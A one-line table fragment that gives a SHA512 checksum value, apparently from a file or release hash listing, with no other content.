| SHA512 | 698b7726d2c431dcaab984fb49dcd787483761ee7105b1d7a8e5db0fc9fb05aa5b707ac966119b222d56fa3a8b764222dca38aeb25734d331bb1b955fbb010d6 |